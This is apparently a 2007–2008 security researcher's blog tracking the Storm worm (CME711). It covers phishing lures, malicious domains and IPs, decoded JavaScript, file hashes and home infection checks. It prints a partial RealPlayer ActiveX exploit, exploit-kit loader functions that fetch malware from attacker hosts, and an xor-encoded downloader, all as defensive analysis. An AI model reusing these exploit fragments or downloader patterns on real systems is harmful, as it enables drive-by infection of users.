CME711: Happy Valentines Day and Halifax phish

The CME711 gang has changed their tactics again. We've started seeing emails in our mail drops with pointers to nodes serving "withlove.exe" and "with_love.exe".

So far they have reverted back to sending IP's in the email body, which makes it easy for most spam filters to catch.

The website code looks the same as in previous runs, with false binaries in comments and the greeting:

Your download should begin shortly. If your download does not start
in 10-20 seconds, you can click hereto launch the download
and then press Run

The link is a javascript: document.write( unescape( '%3C%61%20%68%72%65%66%3D%22%77%69%74%68%5F%6C%6F%76%65%2E%65%78%65%22%3E%0D%0A' ) );

That javascript translates to withlove.exe -- Additionally there is an image of a pink heart on the page that links to with_love.exe. You may wish to update your snort signatures.

Additionally we're tracking a phish using stormworm fastflux nodes with the domain ibank-halifax.com.

CME711 Domains offline.

Steven Adair with Shadowserver is reporting that all the Stormworm domains have been marked NOT DELEGATED.

Randy V also performed some checks today and found the same thing. We're keeping a close eye on our honeypot to see if they change domains or if this is simply a smoke screen.

The authors were probably finished with the domains anyway, since its well passed the new year. The DISOG team is placing bets on the next rouse. I say adult rated material for February 14th (St. Valentines Day).

Domains that have been flagged and appear to be disabled:

i-halifax.com, i-barclays.com, newyearcards2008.com, happycards2008.com, uhavepostcard.com, merrychristmasdude.com, newyearwithlove.com, familypostcards2008.com, freshcards2008.com, hellosanta2008.com, happy2008toyou.com, happysantacards.com, hohoho2008.com, santawishes2008.com, santapcards.com, postcards-2008.com, parentscards.com

New Year, Recycled Greeting Cards

The storm authors have made up for their lack of creativity by registering a bunch of domains and quickly changing the filename. Additionally a false name has been added as a comment to the html source:

Your download should begin shortly. If your download does not start in
approximately 15 seconds,<br>
you can <!-- a href="fck2008.exe" !--><script language="javascript">
<!-- a href="fck2009.exe" -->
document.write( unescape(
'%3C%61%20%68%72%65%66%3D%22%68%61%70%70%79%6E%65%77%79%65%61%72%32%30%30%38%2E%65%78%65%22%3E'
) );

The javascript actually reads:

<a href="happynewyear2008.exe">

This was probably done in an attempt to identify automated scripts that parse the page for links, then crawl those links.

The following domains are still active (the other domains registered through ESTDOMAINS were suspended December 28th):

newyearcards2008.com
happycards2008.com
uhavepostcard.com
merrychristmasdude.com
newyearwithlove.com
familypostcards2008.com
freshcards2008.com
hellosanta2008.com
happy2008toyou.com
happysantacards.com
hohoho2008.com

serving the following files:

happynewyear2008.exe
happy_2008.exe
sony.exe

Bah, Storm.

I'd like to thank everyone who wrote in with the updates, CME711 is now using a Happy New Year theme. I would have posted earlier, but I promised the family a full day of Non-Digital happiness and it was truly a white Christmas.

Nothing sexy about this latest run, pretty crappy workmanship. It was an obvious after thought. It probably pissed off the botrunner that so many people were able to catch on to his Naughty Santa theme, so he produced a text only front page:

Happy New Year!

Your download should begin shortly. If your download does not start in approximately 15 seconds, you can (happy2008.exe) click here to launch the download and then press Run. Enjoy!

Hardly worth a post, except to exclaim how pathetic it looks. Certainly not the experience we've seen from these guys in exploits past. The domain was even registered December 23rd, such poor planning. Not an encoded javascript in sight. I wonder how much money these guys are paying their graphic designers. Certainly more than they're making. Even second rate script rats should think twice before getting in bed with these goons - they're too famous.

So, the domain? uhavepostcard.com. (also happycards2008.com)
Are the others still resolving? Yup.
Which binaries still work? stripshow.exe sony.exe happy2008.exe (update: happy-2008.exe)
Should the offenders be strung up by their toes and fed spoiled eggnog for 30 days? ;)

I sincerely hope that everyone else had a wonderful holiday, and for my New Years wish, I'd like a picture of the CME711 weenies drinking well expired eggnog. I'd also settle for another wonderful day with the family, as it was today.

Stormworm is back. - Have a Merry Christmas Dude, Mrs. Claus is kinky!

We just received a handful of these in our mail drops. Looks like the grinch still runs storm.

Received: from odv ([129.65.118.202])
by dxmbg (8.13.4/8.13.4) with SMTP id lBO3q3Xg061735;
Sun, 23 Dec 2007 19:52:03 -0800
Message-ID: <002601c845e0$2b459370$ca764181@odv>
From: jyothi@acc.aon.com
To: Nicholas
Subject: Santa Said, HO HO HO
Date: Sun, 23 Dec 2007 19:50:48 -0800
MIME-Version: 1.0
Content-Type: text/plain;
format=flowed;
charset="iso-8859-1";
reply-type=original
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2800.1106
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1106

hey,

I know you hate these kind of emails but this one is different. This
will be the best 2 min you spend this holiday. hehe
http:// merry christmas dude . com/

Which plays a happy little Christmas tune, offers stripshow.exe and visits this Neosploit:
http:// merrychristmasdude .com/ cgi-bin/ in.cgi?p=100

In place of MerryChristmasDude you could use ltbrew, tibeam, etc.

JSDecode (See previous post) has no issues with this javascript, and cleans it up to show:

var script = document.createElement("script");

script.setAttribute("language", "JavaScript");
script.setAttribute("src", "?t=595022058&r=2792316769&h=965359931&n=2128949605&flag_i");

document.body.appendChild(script);

So we look at cgi-bin/in.cgi?t=595022058&r=2792316769&h=965359931&n=2128949605&flag_i...

It took two passes, but JSDecode did its job:

....snip...

function startANI()
var ifr = document.createElement("div");
document.body.appendChild(ifr);
ifr.innerHTML = 'iframe src="?o2&p=595022058&r=2792316769" height="1" width="1"'
      return 0;
}

if (startMDAC() || makeSlide() || startQuickTime() || startSuperBuddy() || startAudioFile() || startGOM() || startWVF() || startANI()) { }
setTimeout("window.location = 'http://www.google.com'", 5000);

...snip...

The ANI looks fun:

From:
Subject:
Date: Thu, 20 Dec 2007 08:57:57 -0800
MIME-Version: 1.0
Content-Type: multipart/related;
type="text/html";
boundary="----=_NextPart_000_0005_01C842E6.6AA3A540"
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.2180
This is a multi-part message in MIME format.
------=_NextPart_000_0005_01C842E6.6AA3A540
Content-Type: text/html;
charset="windows-1251"
Content-Transfer-Encoding: quoted-printable
Content-Location: http://testtest/index.html

------=_NextPart_000_0005_01C842E6.6AA3A540
Content-Type: application/octet-stream
Content-Transfer-Encoding: base64
Content-Location: http://testtest/1.dat
....
[BASE64 ENCODED FILE - infected: Exploit.Win32.MS05-002.Gen]

Once ran in the Sandbox, %windir%/disnisa.exe is the binary and %windir%/disnisa.config holds the peer list.

Same old storm, binary changes every few seconds, and someone's going to fall for it.

Complete binary analysis can be found at ASERT (Arbor Networks, Jose Nazario)

The silent Storm and Javascript Decoding

Its been awhile since I've posted anything. I haven't lost touch, I've just been busy with the upcoming Holiday, and reserving myself for the next big Storm update.

A few of us were talking about Storm the other day, and Paul suggested that perhaps the authors have simply abandoned the current Storm botnet, in favor of laying low for a few months, and releasing a whole new version of the code, one with less bugs and some tactical modifications that might make it harder for security researchers to track them. I'm beginning to wonder if he's right. Storm has been silent since mid November. Is a New Year virus going to be born, something far more intrusive than Storm? Only time will tell. Thankfully we're getting a much needed break, so we can focus on other botnets.

---

There have been a good number of emails coming from users who wonder how we're able to decode some of the JavaScript seen on malware sites. The question usually comes after a reader has spotted a dangerous looking page, and we've confirmed it.

Daniel Wesemann has a great write up here. In fact Daniel sparked my interest in decoding malicious javascript instead of just running it through Rhino.

He and Jose Nazario with Arbor Networks have been great mentors. I thought I'd share something I put together using the skills taught by these two fellows.

I've built an automatic Javascript Decoder, which you can freely download and use. It is coded with an eye towards the unix flavor of OS, but should work fine if you have SpiderMonkey installed for windows, and don't mind modifying the code slightly. Jsdecode a public domain script that is simply a wrapper for Mozilla's SpiderMonkey application. Therefore, SpiderMonkey must be installed before this script will work.

Most of the malicious Javascript can be decoded by simply running it through this script. So far I've only had a handful of malicious javascripts requiring more advanced thought. The script isn't magic. It just creates a document.write function for you, and modifies eval statements so they print to the screen, and reruns the decoded javascript to make sure its just not double encoded. Other security researchers have written much better products, for example Malzilla from Boban Spasic.

This script just solves the "quick and dirty" requests I get on an almost daily basis. As is the case with any of my scripts, you're welcome to share them, modify them, even call them your own - but please give credit where credit is due, specifically to Jose and Daniel. If you use the script, or its techniques, consider dropping them a line and thanking them for helping educate the rest of us.

Happy Holidays,

Nicholas

jsdecode.pl.txt (rename to jsdecode.pl)

QuickTime and RealPlayer Exploits

We're seeing lots of reports about Quicktime and RealPlayer exploits in the wild. Other security vendors are privately reporting an excess of 300 sites infected with these exploits. Most of them are iframes pointing to encoded Javascript. Of course users may never even know they've been infected.

Here is a partial snip of one exploit in human readable form:

function RealExploit()
{
var user = navigator.userAgent.toLowerCase();
if(user.indexOf("msie 6")==-1&&user.indexOf("msie 7")==-1)
return;
if(user.indexOf("nt 5.")==-1)
return;
VulObject = "IER" + "PCtl.I" + "ERP" + "Ctl.1";
try
{
Real = new ActiveXObject(VulObject);
}catch(error)
{
return;
}
RealVersion = Real.PlayerProperty("PRODUCTVERSION");
Padding = "";
JmpOver = unescape("%75%06%74%04");
for(i=0;i<32*148;i++)
Padding += "S";
if(RealVersion.indexOf("6.0.14.") == -1)
{
if(navigator.userLanguage.toLowerCase() == "zh-cn")
ret = unescape("%7f%a5%60");
else if(navigator.userLanguage.toLowerCase() == "en-us")
ret = unescape("%4f%71%a4%60");
else
return;
}
else if(RealVersion == "6.0.14.544")
ret = unescape("%63%11%08%60");

.....
(removed some content)
.....

PayLoad = Padding + AdjESP + Shell;
while(PayLoad.length < 0x8000)
PayLoad += "copyleft";
Real.Import("c:\\Program Files\\NetMeeting\\TestSnd.wav", PayLoad,"", 0, 0);
}
RealExploit();

Many people forget to upgrade the their third party applications. Please remember to apply all security patches for those as frequently (or more so) than Windows updates.
In other news,

Storm (CME711) has been very quiet for about two weeks now. The websites are still listening, but not serving any content. I still expect something big for the Christmas/Hanukkah season.

A large number of readers have reported phishing sites since my last blog posting. I wouldn't be surprised to hear there are more victims with the online gift buying season in full swing.

Spam (especially adult oriented) appears to be on the rise, at least to our mail drops. In the last two hours we've received 86 enlargement offers - Perhaps someone is trying to tell me something? -- Maybe my wife is behind that campaign...

Happy Holidays!

Stormworm using Geocities.

The Storm authors have updated their spam templates again. The spam links to several dozen Geocities pages.

Within the Geocities pages is some pretty poorly encoded Javascript. It decodes to:

<script type="text/javascript">
if (top.location != location) {
top.location.href = document.location.href ;
}
window.location = "http:// 58.65.238. 36/ aes/"
</script>

(Spaces added to prevent accidental clicks)

That site opened by the Javascript looks like this:


The links would have you download iPIX-install.exe (md5: d23355080a5c4705300a617c864df35c) which creates and runs the file %system32%\ntos.exe on each reboot.

Anubis is perhaps the best public sandbox system I've seen. Their report on this file can be found here.

CME711-Track Beta

Several people are interested in learning more about CME711 and generally how to track botnets. I fully respect and encourage that curiosity with one caveat - you will get attacked and storm may not be the best starter botnet.

If the bad guys are half as good as I suspect they are, they already know how I am downloading their binaries, and they don't care or there is nothing they can do about it. Furthermore, its easier to hide in plain sight, so I've made a decision to open some code up to everyone. It really isn't all that special and others are probably using similar code. For someone new to this fight, it may be the jump start you need. Good botnet monitoring skills are in high demand.

Originally we ran FakeSMTP (an email honeypot) and forced the Storm binaries to communicate with that SMTP server instead of using public relays. FakeSMTP would capture the body of the message, which had the download link. I had a script automatically parse and download the binaries, but that was slow and clunky. It also relied on my node being used as a spam proxy, which was happening less frequently.

Additionally that meant I had to run the binary. Running the binary is risky. For example, you could participate in denial of service attacks. Even with rate limiting, you still run the risk of doing harm. Its certainly not recommended for those who are new to the arena.

CME711-Track is a PERL script I hacked together for tracking the Peacomm/Storm/Peed/Nuwar trojans. Similar code has been used by DISOG since July 2007. While I modified the code slightly for public release, the general function is the same. The script is very simple, it contacts CME711's servers and tries to download a binary. If successful, it saves the file and adds a time-stamp to the log. Such logs can be used as blocklists, or to track infected hosts.

I overly commented the code on purpose. I had hoped those new to PERL and the world of botnet tracking would download it and learn how things work. Plain text readable comments and code encourage additional research.

There are zero license restrictions on this script. Anyone is welcome to run it, for as long as you wish. I hope you would consider mentioning DISOG in any research/postings; however if you don't, my feelings aren't likely to be hurt.

Script requirements: see "readme.txt" for more information. The code will not run if you don't follow the directions included in the readme. I did that on purpose - I believe if you can't read, you shouldn't be tracking botnets.

WARNING: This script will attempt to download live malware and no support is provided. You assume all risks associated with downloading malware, or pissing off the botnet operators. This includes denial of service attacks. I tried to comment the code as much as possible, and you're welcome to send questions via email. I will do my best to answer them in a timely manor.

http://www.disog.org/public/CME711-Track.zip
(MD5: ac85bf1b06be2653c6e647b839c5a9b9 ) (SHA1: b4c93d489693616a8150e607d4b7e98ca1b2ec61)

Be smart! This code should run on any operating system with a PERL interpreter, which includes Windows. How ever it will download real malware. The risk of accidentally running this code on a Windows machine is high. I don't recommend it. Run it on Linux, Mac, or a virtual windows machine. You'll be wasting a lot of time cleaning up your machine - not to mention looking like an idiot - if you don't follow this simple warning.

New style, same old exploits

The witches and goblins of storm have not finished their Halloween wrath.

At about 1300 hrs, UTC on November 7th, the xor’d mpack javascript was replaced with an iframe:

http://removed.for.your.protection/cgi-bin/in.cgi?p=user1" height="0" width="0"

This iframe redirects you to some heavily layered javascript. After peeling back the layers, the finished product looks like this:

…snip…

function startMDAC() {
var t = new Array('{BD96C556-65A3-11D0-983A-00C04FC29E30}', '{BD96C556-65A3-11D0-983A-00C04FC29E36}', '{AB9BCEDD-EC7E-47E1-9322-D4A210617116}', '{0006F033-0000-0000-C000-000000000046}', '{0006F03A-0000-0000-C000-000000000046}', '{6e32070a-766d-4ee6-879c-dc1fa91d2fc3}', '{6414512B-B978-451D-A0D8-FCFDF33E833C}', '{7F5B7F63-F06F-4331-8A26-339E03C0AE3D}', '{06723E09-F4C2-43c8-8358-09FCD1DB0766}', '{639F725F-1B2D-4831-A9FD-874847682010}', '{BA018599-1DB3-44f9-83B4-461454C84BF8}', '{D0C07D56-7C69-43F1-B4A0-25F5A11FAB19}', '{E8CCCDDF-CA28-496b-B050-6C07C962476B}', null);
var v = new Array(null, null, null);
var i = 0;
var n = 0;
var ret = 0;
var urlRealExe = 'http://removed.for.your.protection/cgi-bin/in.cgi?u2_1_600_2_0_870665223_2792316769_2354152789';
}

…snip…

The link in the urlRealExe variable is formally known as file.php. It is a downloader which grabs sony.exe and connects to the network.

There has been no change in the social engineering vectors, but the attempts to hide their exploit in layered javascript is new and might confuse antivirus.

Update: The servers are now responding with 500 (Internal Server Errors) when trying to access the /cgi-bin/in.cgi file.

Update 2: The new filename is dancer.exe. The email body provided to me has the word 'plain' incorrectly spelled as plane.

Detecting CME711 (Storm)

For those of you just joining us...

The trojan known as CME711 by Mitre, or Peacomm, Peed, Storm, and Nuwar, infects machines using social engineering. A user will receive an email with a half dozen or less lines of text. The email suggests the user will receive a greeting card, free game, or music sharing software. Other social engineering spams attributed to Storm have been placed on blogs and webpages.

More often than not, unsuspecting users will click the link provided in these emails or blogs. For those who are unlucky enough to have not applied patches to their operating system or third party software, the authors of this trojan have left a special treat - a javascript ripped from the Mpack suit.

When an unpatched user visits an Mpack infected site, they are infected with a host of malware. No user interaction is required for infection.

For those who have applied all patches, the authors have created a professional looking webpage that may spark your interest and have you clicking links. Either way, the end result is an infection, and your PC is turned into a zombie for the Storm botnet.

The botnet communicates using the same peer to peer technology as many file sharing applications like Gnutella and EDonkey. Since it uses this technology, it is hard to determine where botnet commands originate or how many zombies are a part of this botnet. Due to the peer to peer structure, locating the person controlling this network is very difficult. Worse still, the commands issued by the botnet controller are encrypted. The network uses DNS Double FastFlux to keep researchers from shutting the malware distribution points. Over 40,000 unique IP addresses have been seen by DISOG in the last 6 months serving malicious code for Storm. The Storm botnet is truly a global pest.

Many people have written in and asked for quick ways to detect if they are infected with Storm. This is difficult because Storm uses rootkit technology, to add to the misery, the code morphs every 30 to 60 seconds. This means you are unlikely to infect yourself with the same piece of code twice.

I've tested a few of the freely available rootkit detectors, and have come up with this pattern for tests:

Install rootkit detector -> run test -> reboot -> run test again.

Sophos rootkit detector and gmer both detected the hidden files after reboot, but neither detected on the first test.

Many people are reluctant to install another piece of software and I can understand why, so I decided to test the current version of Storm's file hiding technology. What I found is that you're able to determine if you've been infected by creating one file, and then trying to list that file using the dos directory (dir) command. You are also able to do this from the GUI, however the results are a little less obvious.

For this test, click start->run and type "cmd" (without quotes). A Command Prompt window will appear. Next you will want to create a file called spooldr.test. Do so by typing 'copy con spooldr.test'. Nothing will appear to happen, you will just be pushed to a blank line below your copy con command. Type something random and press enter. Then press the F6 key. You will see ^Z and '1 file(s) copied.' then you will be returned to your command prompt (C:\Documents and Settings\whatever\>) again. What you've just done is created a file with whatever text you typed on the blank line, just like if you created a new file in notepad and saved it.

Type 'dir spooldr.test'. If you're able to see the file with the current date and time, you're not infected with this version of Storm. If you can't list this file, you're probably infected, and need to seek professional help for removal.

It is trivial for the Storm authors to change their tactics and use another pattern for hiding their files. (SEE UPDATE BELOW!) I will try to keep on top of any changes and post them here - for now this should work on most systems. I could have written a program to do this for you and I am sure someone else will. However I believe in education, and you just can't learn anything if someone does all the work for you.

My first test was to run the most recent version of Storm as a normal, unprivileged user. The bot did make contact with the Storm network, however the rootkit function did not work, and I was able to see the spooldr.cfg file, which contains the current list of peers assigned to my computer. Upon reboot the software did not restart, so my machine did not participate with the botnet any longer. Running the code as administrator was when it became dangerous. Security experts have long recommended using a non-privlidged account for normal operations and only logging in as administrator when absolutely necessary. As if you needed another reason, right?

UPDATE:

McAfee is reporting the filenames have changed from spooldr.* to noskrnl.*. They also reminded us that wincom.* was used towards the beginning of the year. Its doubtful they changed the name based on this blogpost. More likely it was just good timing. I just grabbed a new binary and its still using spooldr.* - to be safe, try all three files.

MP3 Pump and Dumps -- UPDATED

Private security lists are buzzing about the latest Storm (CME711) Pump and Dumps are coming as MP3 audio attachments. Our mail drops have not received any of these yet, because our mail servers drop those attachments.

I've removed that restriction and hope to capture some samples soon. I've heard a sample and was barely able to understand the audio, though it is in English. I do not have permission to share that sample, so I will not be posting it here.

If you have a sample you'd like to share with the other readers, please send it as a zip attachment to security at disog dot org and let us know if we can attribute it to you.


Thanks for the submissions!

From an anonymous administrator

From Brent Eads

0.0.0.0 - UPDATED.

Once again, CME711's domain resolvers are all pointing to 0.0.0.0 - which suggests another change is upon us.

What will it be this time? Baseball? My home team has just swept the Diamond Backs, and made it to the World Series. Congratulations to the Colorado Rockies! The last 22 games have been outstanding!

---

Update from Randy V:
They are back in full force. A nearly complete turn over of the active list from yesterday:

190.128.76.140 200.127.196.112 201.235.46.246 24.126.26.18 67.190.138.189 68.113.78.23 68.57.236.13 68.76.98.212 69.230.199.160 70.243.202.40 70.244.102.159 74.139.41.221 76.100.35.250 76.226.146.196 76.73.135.17 85.187.86.249 88.74.161.197

and the currently active list:

209.102.175.61 219.115.223.181 24.178.197.7 24.178.99.202 24.210.99.223 24.235.140.159 61.84.67.116 67.64.104.4 68.76.98.212 69.151.234.219 71.79.181.218 72.128.41.234 72.128.61.29 72.160.184.227 74.140.168.34 76.216.62.73 76.226.146.196 76.99.89.48 77.197.44.76 84.174.112.145 84.42.164.6 89.112.20.242 98.195.153.198 98.197.63.176

Only 201.235.46.246, 68.76.98.212 and 76.226.146.196 are in common. 76.226.146.196 is probably only a proxy.

Baseball does sound like a ripe target. There has not been a page change yet.

Update 2 (from Nicholas):
OpenDNS is null routing all CME711 domains. You can protect yourself from some of the effects of this trojan by changing your domain servers to 208.67.222.222 and 208.67.220.220. For more information visit the OpenDNS website.

Some more CME711/STORM IPs and other statistics

There have been a number of requests in mailing lists and privately for the latest Stormworm numbers. It seems people like statistics.

Since Oct 1st, 2007 we've identified 4,149 unique IP addresses participating with our honeypots, either p2p, in DDOS attacks, or spreading 'spa-m-alware' (mostly the later, since our smtp honeypot is setup to capture outgoing spam, and there is lots of it).

Additionally, our sensors have downloaded 7,202 Storm binaries, resulting in 4,661 uniquely hashed downloads since Oct 1st, 2007. A total of 43,897+ unique binaries have been captured to date.

The domains are slow to resolve again, some of them not responding at all. This is probably because the author is looking to spread the executable SuperLaugh.exe and working to change his sites. SuperLaugh will be spammed using the rouse 'a funny cat e-card.'

Lending an air of credibility to the scam SuperLaugh.com, which is a valid ecard site, also has a file called SuperLaugh.exe which is downloaded from http:// www.superlaugh.com/ icon/SuperLaugh.exe and has an MD5Sum of 571dd3cec20da6c70a3b62fa9f3637a8. Our anti-virus scanners say the legit file is harmless.

Malware Page:

Legit Page:

(The pages are both animations, the cat towards the front has a moving head, and both cats have cartoon balloons with scripted text)

In addition to the static html code, the authors are also attaching the Mpack xor'd javascript to the end of their pages. The javascript will attempt to exploit several old vulnerabilities within windows and third party software. It forces the download of file.php, a downloader.

It's still surprising to me how many ISP's are allowing these domains to resolve. The bad press coverage should be enough for the ISPs to start null routing those domains. We're still getting activity on the following domains:

ptowl.com tibeam.com kqfloat.com snbane.com yxbegan.com wxtaste.com eqcorn.com bnably.com ltbrew.com

We received an email from someone we suspect was trying to take over the Storm botnet. When we did not provide him with the requested information we believe he launched a JoeJob attack as described in the last blog entry.

We've seen researchers using TOR to capture binaries or communicate with the network, we see denial of service attacks on high profile IP's, probably related to researchers honeypots, and we suspect we've seen a few attempted take over attacks.

The authors don't appear to be letting up. The change in malware file names tells me they are getting greedy or preparing for something big.

As more black hats investigate the CME711 code, the network will become more vulnerable to takeover attacks. I hope these guys cut their losses and start breaking down the net soon. I would hate to see such a large botnet in the hands of some second rate script kiddy.

Stormworm - iframe hell.

This morning we started receiving dual language Storm worm Emails:

From: fuzzarnsjjvr@sdc-dsc.gc.ca
Date: Sep 28, 2007 7:12 AM
Subject: Don't forget to play a game today
To: me



Too many hot games to mention; get 1000 free games. http://68.77.xx.xx/

Смотри что о тебе пишут,ну ты и сука,смотрите все! вот адресс
http:// bl0cker.info/ suki .php?new=pidori

(Spaces and xx's added to protect from accidental clicks)

The Russian suki.php page doesn't yet resolve (404 error) however there is an index page and it has javascript iframes pointing to

http:// 58.65.239.66 /~lem0n/st/go.php?sid=1
http:// 58.65.239.66 /~lem0n/st/go.php?sid=2
http:// 58.65.239.66 /~lem0n/st/go.php?sid=3
http:// 58.65.239.66 /~lem0n/st/go.php?sid=4

the sid=1 sid=2 and sid=3 pages are all fake error pages with more iframes:

http:// bl0cker.info /mail/cn.php
http:// lem0n.info /xxx/iframe.php
http:// lem0n.info /xxx/m/iframe.php
http:// bl0cker.org /xxx/iframe.php
http:// space-sms.info /xxx/iframe.php
http:// bl0cker.info /bn/index.php

sid=4 is a javascript encoded page that trys to download http:// bl0cker.info /bn/exe.php

So how deep can it get? I followed the white rabbit through a few more links:

cn.php is an iframe that points to http:// eliteproject.cn /ts/in.cgi?alex

lem0n.info /xxx/iframe.php is a javascript that points to http:// bl0cker.info /bn/index.php

lem0n.info /xxx /m/iframe.php: is a lot of errors:

Warning: fopen(redir.txt) [function.fopen]: failed to open stream:
Permission denied in /usr/home/lem0n/domains/lem0n.info/public_html/xxx/m/iframe.php
on line 40

Warning: flock() expects parameter 1 to be resource, boolean
given in /usr/home/lem0n/domains/lem0n.info/public_html/xxx/m/iframe.php
on line 41

Warning: ftruncate(): supplied argument is not a valid stream
resource in /usr/home/lem0n/domains/lem0n.info/public_html/xxx/m/iframe.php
on line 42

Warning: fwrite(): supplied argument is not a valid stream
resource in /usr/home/lem0n/domains/lem0n.info/public_html/xxx/m/iframe.php
on line 43

Same errors in http://bl0cker.org /xxx/iframe.php and http:// space-sms.info /xxx/iframe.php.

eliteproject.cn /ts/ in.cgi?alex is an mpack that points to http:// superengine.cn /1278/file.php (binary file)

In summary, possible new Storm domains:

superengine.cn
eliteproject.cn
space-sms.info
lem0n.info
bl0cker.org
bl0cker.info

None of these are fastflux --yet.

Space-sms, lem0n.info, bl0cker.org and bl0cker.info all use the same name servers, ns1 and ns2.spektor.ws.

NS2 points to the same IP (58.65.239.66) as the A records for the new domains.

Stormworm Tactics Change to Football Fungus

Some recent changes involving storm:

Starting about 13:50 GMT Randy V noticed the domains started rotating the IP's less frequently. Looking back at my logs I came up with this:

2007-09-08 13:49 (GMT): 12.216.204.171
2007-09-08 13:49 (GMT) - 2007-09-08 13:57 (GMT): 208.115.203.105
2007-09-08 13:58 (GMT) - 2007-09-08 14:03 (GMT): 76.226.146.196
2007-09-08 14:04 (GMT) - 2007-09-08 14:20 (GMT): 72.40.18.87
2007-09-08 14:21 (GMT) - 2007-09-08 14:30 (GMT): 209.30.158.167
2007-09-08 14:31 (GMT) - 2007-09-08 14:49 (GMT): 70.129.33.116
2007-09-08 14:50 (GMT) - 2007-09-08 15:15 (GMT): 74.73.209.16
2007-09-08 15:17 (GMT) - 2007-09-08 15:26 (GMT): 121.114.132.128
2007-09-08 15:26 (GMT) - 2007-09-08 15:34 (GMT): 75.132.218.100
2007-09-08 15:35 (GMT) - 2007-09-08 15:43 (GMT): 75.66.243.62
2007-09-08 15:44 (GMT) - NOW: 127.0.0.1

From 15:44 to ~17:00 the index page showed:

Welcome to nginx!

Now the index page is NFL related (and nicely done) which is sharing NFLTracker.exe (NFLTracker.exe - Infected: Trojan.Peed.III). Its not using any of the xor'd javascript or browser exploits. This page is strictly social engineering.

(DISOG Screen Capture: Sept 8, 2007)

Our guess is the domains will be changing soon, with football related names - or that there will be mass infection of football related sites with frames pointing to the peer pages.



UPDATE: Binary is now called 'tracker.exe'

CME711 (Storm) using TOR rouse

This morning I woke up to the latest storm page...

<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.0 Transitional//EN\">
<html>
<head>
<title>Tor: anonymity online</title>
</head>
<body>
<table border=0 width=\"500\">
<tr><td><img src=\"img/tor1.gif\"></td><td><h2>Tor: anonymity online</h2></td></tr>
<tr><td colspan=\"2\">
<br>
Tor is a toolset for a wide range of organizations and people that want to improve their safety and security on the Internet. Using Tor can help you anonymize web browsing and publishing, instant messaging, IRC, SSH, and other applications that use the TCP protocol. Tor also provides a platform on which software developers can build new applications with built-in anonymity, safety, and privacy features.
<br><br>
Tor aims to defend against traffic analysis, a form of network surveillance that threatens personal anonymity and privacy, confidential business activities and relationships, and state security. Communications are bounced around a distributed network of servers called onion routers, protecting you from websites that build profiles of your interests, local eavesdroppers that read your data or learn what sites you visit, and even the onion routers themselves.<br><br>
<a href=\"tor.exe\"><img src=\"img/tor2.png\" border=0></a>
</td></tr>
</table>
</body>
</html>

The text is a word for word cut and paste from the official TOR website, tor.eff.org.

In summary, they're wagering more clicks by offering The Onion Router (TOR) Proxy. Of course the binary is the standard CME711 trojan, nothing so fancy. At least they could have included TOR in the download!

The files file.php, sony.exe and tor.exe are resolving while video.exe, setup.exe and labor.exe no longer resolve.

UPDATE: TrendMicro has a nice writeup on this too: http://blog.trendmicro.com/nuwar-poses-as-tor-proxy/

Storm, meet Danchev - and SMTP Honeypots.

Dancho Danchev has been playing around with storm's fastflux and created some neat pictures showing how dynamic this network actually is.

His blog post is located here: http://ddanchev.blogspot.com/2007/09/storm-worms-fast-flux-networks.html

DISOG has been running internal SMTP honeypots for Stormworm since around August 15th. Since that date we've captured over 22,000 unique IP addresses!

Today was a slow day, 1651 unique IPs in just under 6000 emails. Since September 1st, we've managed to capture over 4685 unique IP addresses.

(Note, many IP's have been cleaned already, they are posted here for historical purposes only)

Latest Stormworm sharing Labor Day greetings

The CME-711 (Stormworm) peers are now spreading windows executable files with the following names:

file.php, video.exe, setup.exe, sony.exe and labor.exe

Sony.exe and labor.exe are new over the last 48 hours. Be sure to update your IDS Signatures.

Labor.exe is in reference to the Labor Day holiday:

Our Greeting System has a Labor Day card for you, go here to pick it up:

http:// yahoo.com /07cards/ greet1?[random hex string]

We're getting a new file on each download attempt again:

413801f06694ad17a7fa03508317fdac labor.exe
4f69c5550a497a02e0f690945925f398 labor.exe
024bf16416645df65358777b214d7997 labor.exe
2aa54149fcfc7ebaa960a8d5648d7dbb labor.exe
6cd2ed30fc3653f241b0702ef4c6f3c6 labor.exe
95b57c8cf2022317aafca06dae2d14be labor.exe
352cf8ef2bbca763d2d03e83fb86c9fd labor.exe
781e08a5dcc2c53646ed097e533d6659 labor.exe
accc4e975b8ab70b4286d113fe5e09dc labor.exe
7375b5c6614cf1a24713949a2ea9800a labor.exe
d43611911af1f7a2401faab91214c2bc labor.exe
cbe59b6688925857ab76301ce61919e5 labor.exe
0b9b061d368763ab51bf6d78f3c36086 labor.exe
651709024ebb9b830fdb9fca161348ae labor.exe

Our MD5 list has been updated, identifying the 26,200+ binaries we've captured. You can view it here.

Peacomm gets scrappy with Kaspersky

This was sent to us by a reader earlier this week:

<iframe src=\"http://kqfloat.com/ind.php\" alt=\"BYDLOSHKA\" height=\"1\" width=\"1\"></iframe>

I spent a few minutes looking at the code this evening...

Downloads xored javascript (like usual) ->

function xor_str(plain_str, xor_key){ var xored_str = \"\";
for (var i = 0 ; i < plain_str.length; ++i) xored_str += String.fromCharCode(xor_key ^ plain_str.charCodeAt(i)); return xored_str; } function kaspersky(suck,dick){}; function
kaspersky2(suck_dick,again){};var plain_str =
....
....
SNIP
....
....
var xored_str = xor_str(plain_str, 200); eval(xored_str);

which downloads -> 'http:// fncarp.com /sony.exe' using the useragent:

Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1921)

Sony.exe appears to be static, just like video.exe and setup.exe (c05893a656b54164fb486028309bd89e)

Peed Goes Static

For the last few days, the Peed servers have stopped rotating their malware. They are sticking with the static MD5 sum of c05893a656b54164fb486028309bd89e.

Most of the major Antivirus vendors are aware of the file:

File setup.exe received on 09.01.2007 17:54:57 (CET)
Antivirus	Version	Last Update	Result
AhnLab-V3	2007.9.1.0	2007.09.01	Win32/Zhelatin.worm.138240.B
AntiVir	7.4.1.66	2007.08.31	Worm/Zhelatin.HJ
Authentium	4.93.8	2007.09.01	W32/Tibs.XB
Avast	4.7.1029.0	2007.09.01	Win32:Tibs-BCY
AVG	7.5.0.484	2007.08.31	Generic6.WTZ
BitDefender	7.2	2007.09.01	Trojan.Peed.PB
CAT-QuickHeal	9.00	2007.09.01	-
ClamAV	0.91.2	2007.09.01	-
DrWeb	4.33	2007.09.01	BackDoor.Groan
eSafe	7.0.15.0	2007.08.29	-
